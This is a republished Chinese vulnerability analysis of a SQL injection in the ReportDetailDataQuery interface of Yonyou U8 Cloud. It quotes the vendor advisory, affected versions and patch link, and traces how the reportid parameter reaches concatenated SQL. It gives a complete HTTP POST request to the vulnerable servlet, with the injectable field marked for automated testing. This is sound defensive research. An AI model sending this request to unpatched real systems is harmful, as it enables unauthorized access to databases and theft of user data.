官网通告
一、漏洞描述
攻击者未经授权可以访问数据库中的数据,从而盗取用户数据,造成用户信息泄露。
二、影响版本
2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,5.0
三、修复方案
升级补丁 <U8CLOUD系统ReportDetailDataQuery接口存在SQL注入漏洞的安全补丁> </U8CLOUD系统ReportDetailDataQuery接口存在SQL注入漏洞的安全补丁>
官方链接:https://security.yonyou.com/#/patchInfo?foreignKey=202b369a372c4ac4994ada096b25fa21
漏洞分析
定位ReportDetailDataQuery类
接受2个参数usercode和reportid,这里usercode会默认赋值不可控,存在问题的点是reportid
后续会调用gson.fromJson解析,所以请求内容必须为json格式,不然会报错
后面就是正常的调用queryVO进行sql查询
跟进查询方法
这里调用queryVOByPk 将reportformid值传入拼接sql后调用retrieveByClause进行查询
后续流程在JdbcPersistenceManager#buildSql中将查询的sql前面拼接成完整的select 语句进行查询
完整请求
POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.ReportDetailDataQuery HTTP/1.1
Host: 172.18.60.85
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
Content-Type: application/json
Content-Length: 29
{"usercode":1,"reportid":"*"}
补丁修复:
直接判断输入内容是否存在单引号
原文始发于微信公众号(DFF Team):U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论